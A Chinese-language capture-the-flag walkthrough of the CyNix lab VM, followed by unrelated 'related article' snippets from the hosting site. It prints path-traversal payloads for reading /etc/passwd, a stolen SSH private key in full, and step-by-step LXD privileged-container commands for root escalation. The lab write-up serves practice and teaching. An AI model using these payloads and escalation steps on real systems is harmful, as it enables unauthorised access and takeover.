CyNix

CyNix

一、主机发现和端口扫描

  • 主机发现,靶机地址192.168.80.146

    arp-scan -l
    

    在这里插入图片描述

  • 端口扫描,只开放了80和6688端口

    nmap -A -p- -sV 192.168.80.146
    

    在这里插入图片描述

二、信息收集

  • 访问80端口

    在这里插入图片描述

  • 路径扫描

    gobuster dir -u http://192.168.80.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50
    

    在这里插入图片描述

  • 访问/lavalamp

    在这里插入图片描述

  • 扫描/lavalamp路径

    gobuster dir -u http://192.168.80.146/lavalamp/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50
    

    在这里插入图片描述

  • 访问head.php

    在这里插入图片描述

三、漏洞发现

  • 访问head.php页面,查看源码发现一段备注是的JS代码

    function lhook(id) {var e = document.getElementById(id);if(e.style.display == 'block')e.style.display = 'none';elsee.style.display = 'block';}lhook函数接受一个元素ID作为参数。它使用document.getElementById获取元素,并将其存储在变量e中。如果元素的display样式当前设置为'block',则函数将其更改为'none'。否则,它将显示样式更改为'block'。这在调用函数时切换元素的可见性
    
  • 好像也没啥用,有返回到主页面,有个提交的表单,提交一下发现了新大陆

    在这里插入图片描述

  • 直接访问/lavalamp/canyoubypassme.php,发现和之前的一样,但是查看源码时发现,它的body标签有内容,而且里面存在猫腻,发现有个透明度被设置为0(opacity: 0.0)的table标签,随即将其修改为opacity: 1.0

    在这里插入图片描述

  • 发现是一个文件下载的功能,抓包看一下

    在这里插入图片描述

四、漏洞利用

  • 经过不断尝试,发现read参数不影响结果,但是file参数存在路径穿越和任意文件读取

    /test/../../../../etc/passwd
    ;../../../etc/passwd
    AAAAAAAAAAAA../../../etc/passwd
    %252e%252e%252f../../../etc/passwd
    %250C../../../etc/passwd
    %25A0../../../etc/passwd
    

    在这里插入图片描述

  • 在文件中发现一个ford用户,尝试访问它的私钥文件

    /test/../../../../home/ford/.ssh/id_rsa
    
    -----BEGIN RSA PRIVATE KEY-----
    MIIEogIBAAKCAQEAk1VUtcYuZmM1Zmm4yNpguzzeocGpMVYC540yT90QqaD2Bsal
    zYqvHKEh++bOL6QTSr0NjU9ifT/lBIVSIA0TpjUTkpdIW045H+NlgMhN0q/x6Yy2
    LofuB4LQqRzr6cP0paoOYNq1KYG3QF1ouGa4k1i0td4DepBxcu4JBMOm20E7BurG
    zo41f/YWjC5DurNjIchzl4GyBClMGSXWbIbr6sYwVx2OKyiPLFLYusrNqwJNQvxz
    Mf5yolEYI8WOXJzCfiPQ5VG8KXBH3FHu+DhFNgrJQjgowD15ZMQ1qpO/2FMhewR6
    gcDs7rCLUUXc9/7uJ7e3zHlUyDgxakYohn3YiQIDAQABAoIBAE/cfSJa3mPZeuSc
    gfE9jhlwES2VD+USPljNDGyF47ZO7Y0WuGEFv43BOe6VWUYxpdNpTqM+WKCTtcwR
    iEafT/tT4dwf7LSxXf2PAUIhUS3W+UYjY80tGTUxD3Hbn3UDJuV1nH2bj3+ENJTL
    DSyHYZ1dA/dg9HnHOfeWV4UhmJxXmOAOKgU9Z73sPn4bYy4B3jnyqWn392MsQftr
    69ZYauTjku9awpuR5MAXMJ9bApk9Q7LZYwwGaSZw8ceMEUj7hkZBtP9W9cilCOdl
    rFXnkc8CvUpLh+hX6E/JOCGsUvdPuVLWKd2bgdK099GrRaenS8SlN0AUTfyNiqg4
    VE7V8AECgYEAwoGVE+Z8Tn+VD5tzQ0twK+cP2TSETkiTduYxU3rLqF8uUAc3Ye/9
    TLyfyIEvU7e+hoKltdNXHZbtGrfjVbz6gGuGehIgckHPsZCAQLPwwEqp0Jzz9eSw
    qXI0uM7n2vSdEWfCAcJBc559JKZ5uwd0XwTPNhiUqe6DUDUOZ7kI34ECgYEAwenM
    gMEaFOzr/gQsmBNyDj2gR2SuOYnOWfjUO3DDleP7yXYNTcRuy6ke1kvMhf9fWw7h
    dq3ieU0KSHrNUQ9igFK5C8FvsB+HUyEjfVpNhFppNpWUUWKDRCypbmypLg0r+9I7
    myrdBFoYv30WKVsEHus1ye4nJzKjCtkgmjYMfQkCgYA0hctcyVNt2xPEWCTC2j8b
    C9UCwSStAvoXFEfjk/gkqjcWUyyIXMbYjuLSwNen0qk3J1ZaCAyxJ8009s0DnPlD
    7kUs93IdiFnuR+fqEO0E7+R1ObzC/JMb3oQQF4cSYBV92rfPw8Xq07RVTkL21yd8
    dQ8DO5YBYS/CW+Fc7uFPgQKBgHWAVosud792UQn7PYppPhOjBBw+xdPXzVJ3lSLv
    kZSiMVBCWI1nGjwOnsD77VLFC+MBgV2IwFMAe9qvjvoveGCJv9d/v03ZzQZybi7n
    KVGp91c8DEPEjgYhigl/joR5Ns3A9p1vu72HWret9F/a5wRVQqK5zL/Tzzgjmb3Y
    QnkBAoGAVosEGOE7GzBMefGHjQGMNKfumeJ01+Av6siAI6gmXWAYBaU618XhFEh1
    +QNoLgWvSXoBuN+pMkxnRCfMTNbD1wSk46tW3sWHkZdV31gKceOifNzMVw53bJHP
    /kto0eGJ/vgM0g9eyqmcpPTVqf7EwkJdo0LngOprNyTk+54ZiUg=
    -----END RSA PRIVATE KEY-----
    

    在这里插入图片描述

  • 复制私钥到kali,ssh访问

    chmod 600 id_rsa 
    ssh ford@192.168.80.146 -p 6688 -i id_rsa
    

    在这里插入图片描述

    在这里插入图片描述

五、权限提升

  • lxd提权,首先在kali上生成镜像

    git clone https://githubfast.com/saghul/lxd-alpine-builder.git
    cd lxd-alpine-builder
    ./build-alpine
    

    在这里插入图片描述

  • 完成上面操作之后会在当前目录下生成一个tar.gz镜像文件,然后把这个文件发送到目标服务器上,需要把镜像挂载到lxd中,然后检查一下当前可用容器,配置完成之后进入容器,定位到/mnt/root即可查看目标主机设备的所有资源。运行了Bash之后,得到一个容器的shell。这个容器中包含了目标主机的全部资源,拥有该靶机的root权限,成功通过LXD提权

    lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
    lxc init myimage ignite -c security.privileged=true
    lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
    lxc start ignite
    lxc exec ignite /bin/sh
    

    在这里插入图片描述

  • 结束

    在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/156574.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

C++之内建函数对象

C之内建函数对象 算术仿函数 #include<iostream> using namespace std; #include<functional>//内建函数对象头文件 //内建函数对象 算术仿函数void test() {// negate 一元仿函数 取反仿函数negate<int>n;cout << n(100) << endl;//plus 二元仿…

软件测试/人工智能丨互联网大厂内的人工智能测试

互联网公司在人工智能&#xff08;AI&#xff09;测试方面一直处于不断发展和演变的状态。互联网公司人工智能测试目前趋势&#xff1a; 自动化测试的重要性增加&#xff1a; 随着人工智能应用的不断增多&#xff0c;互联网公司越来越意识到自动化测试的重要性。自动化测试框架…

可用于短期风速预测及光伏预测的LSTM/ELM预测程序

微❤关注“电气仔推送”获得资料&#xff08;专享优惠&#xff09; 程序内容&#xff1a; 该程序是预测类的基础性代码&#xff0c;程序对河北某地区的气象数据进行详细统计&#xff0c;程序最终得到pm2.5的预测结果&#xff0c;通过更改数据很容易得到风速预测结果。程序主要…

高精度人像背景分割SDK技术解决方案

图像处理技术已经成为企业和个人生活中不可或缺的一部分&#xff0c;特别是在人像处理方面&#xff0c;如何准确、高效地将人物与背景分离&#xff0c;一直是一个技术难题。然而&#xff0c;美摄科技凭借其在AI深度学习领域的深厚积累&#xff0c;推出了一款高精度的人像背景分…

报错:HikariPool-1 - Exception during pool initialization.

问题发现&#xff1a; 原本可以运行的springboot2项目突然无法运行且报错&#xff0c;HikariPool-1 - Exception during pool initialization。 问题分析&#xff1a; 观察报错信息发现是JDBC连接失败&#xff0c;进而搜索HikariPool-1&#xff0c;搜索得知应该是applicatio…

01-论文阅读-Deep learning for anomaly detection in log data: a survey

01-论文阅读-Deep learning for anomaly detection in log data: a survey 文章目录 01-论文阅读-Deep learning for anomaly detection in log data: a survey摘要I 介绍II 背景A 初步定义B 挑战 III 调查方法A 搜索策略B 审查的功能 IV 调查结果A 文献计量学B 深度学习技术C …

postgresql 行转列的例子

postgresql 行转列的例子 首先要启用tablefunc 扩展。 用管理员账户执行下面的指令。 CREATE EXTENSION tablefunc;在 PostgreSQL 中&#xff0c;你可以使用 crosstab 函数将列转换为行。crosstab 函数是在 tablefunc 扩展中提供的&#xff0c;因此在使用之前&#xff0c;你需…

C++中的mutable关键字

mutable是C中的一个关键字&#xff0c;它用来修饰类的成员变量。 当我们将一个成员变量声明为mutable时&#xff0c;就意味着这个成员变量可以被类的任何方法修改&#xff0c;即使这个方法是const类型的。这是因为mutable关键字可以打破const类型的限制&#xff0c;使得const类…

课时6作业2

Description 输入一个整型数&#xff0c;然后申请对应大小空间内存&#xff0c;然后读取一个字符串&#xff08;测试用例的字符串中含有空格&#xff09;&#xff0c;字符串的输入长度小于最初输入的整型数大小&#xff0c;最后输出输入的字符串即可&#xff08;无需考虑输入的…

Springboot+vue的社区医院管理系统(有报告),Javaee项目,springboot vue前后端分离项目

演示视频&#xff1a; Springbootvue的社区医院管理系统(有报告)&#xff0c;Javaee项目&#xff0c;springboot vue前后端分离项目 项目介绍&#xff1a; 本文设计了一个基于Springbootvue的前后端分离的应急物资管理系统&#xff0c;采用M&#xff08;model&#xff09;V&am…

el-form动态表单动态验证(先验证不为空,再验证长度在20以内,最后向后台发送请求验证账号是否重复)

data(){var checkSno (rule, value, callback) > {if (!value) {callback(new Error("请输入账号"));} else if (value.length > 20) {callback(new Error("长度为1-20"));} else {if (this.form.id) {// 修改时检查账号是否重复selectLoginId({ sn…

美国国家安全实验室员工详细数据在网上泄露

一个从事出于政治动机的攻击的网络犯罪组织破坏了爱达荷国家实验室&#xff08;INL&#xff09;的人力资源应用程序&#xff0c;该组织周日在电报上发帖称&#xff0c;已获得该核研究实验室员工的详细信息。 黑客组织 SiegedSec 表示&#xff0c;它已经访问了“数十万用户、员…

JMeter —— 接口自动化测试(数据驱动)

前言 之前我们的用例数据都是配置在HTTP请求中&#xff0c;每次需要增加&#xff0c;修改用例都需要打开JMeter重新编辑&#xff0c;当用例越来越多的时候&#xff0c;用例维护起来就越来越麻烦&#xff0c;有没有好的方法来解决这种情况呢&#xff1f;我们可以将用例的数据存…

Linux学习笔记5-GPIO(3)

经过之前的学习&#xff0c;想开始利用GPIO做一些简单的开发板应用了&#xff0c;做个程序完成2个功能 1.LED灯闪灭 2.通过按键来控制输出&#xff0c;控制开发板的蜂鸣器蜂鸣第一个功能&#xff0c;LED闪灭比较简单&#xff0c;可以写一个led_switch函数&#xff0c;仍然是操…

IP地址定位是如何实现的?

IP定位的实现是通过查找IP地址对应的地理位置信息来实现的。具体来说&#xff0c;IP定位是通过查询IP地址对应的地理位置数据库来获取地理位置信息。这个数据库可以是公共的或者私有的&#xff0c;其中包含了IP地址和地理位置信息之间的映射关系。 在实际操作中&#xff0c;IP定…

C++初级项目-webserver(1)

1.引言 Web服务器是一个基于Linux的简单的服务器程序&#xff0c;其主要功能是接收HTTP请求并发送HTTP响应&#xff0c;从而使客户端能够访问网站上的内容。本项目旨在使用C语言&#xff0c;基于epoll模型实现一个简单的Web服务器。选择epoll模型是为了高效地处理大量并发连接…

Gradle版本兼容性

Gradle版本兼容性 一、Gradle版本和Java版本对应关系 Java版本第一个支持它的Gradle版本82.094.3104.7115.0125.4136.0146.3156.7167.0177.3187.5197.6208.1 参考&#xff1a;Gradle官网) 二、Gradle版本和Kotlin版本对应关系 Gradle 版本Kotlin插件版本Kotlin 语言版本5.…

力扣 622.设计循环队列

目录 1.解题思路2.代码实现 1.解题思路 首先&#xff0c;该题是设计循环队列&#xff0c;因此我们有两种实现方法&#xff0c;即数组和链表&#xff0c;但具体考虑后&#xff0c;发现数组实现要更容易一些&#xff0c;因此使用数组实现&#xff0c;因此我们要给出头和尾变量&a…

Python (十二) 文件

程序员的公众号&#xff1a;源1024&#xff0c;获取更多资料&#xff0c;无加密无套路&#xff01; 最近整理了一份大厂面试资料《史上最全大厂面试题》&#xff0c;Springboot、微服务、算法、数据结构、Zookeeper、Mybatis、Dubbo、linux、Kafka、Elasticsearch、数据库等等 …

编写支持灵活过滤的列表接口以解析前端过滤表达式

为了实现支持灵活过滤的列表接口&#xff0c;你可以考虑使用一种常见的方法是通过HTTP查询参数来传递过滤条件。前端可以通过构建适当的查询参数来指定过滤条件&#xff0c;而后端则需要解析这些参数并应用到数据列表上。 以下是一个基本的示例&#xff0c;演示如何在后端使用…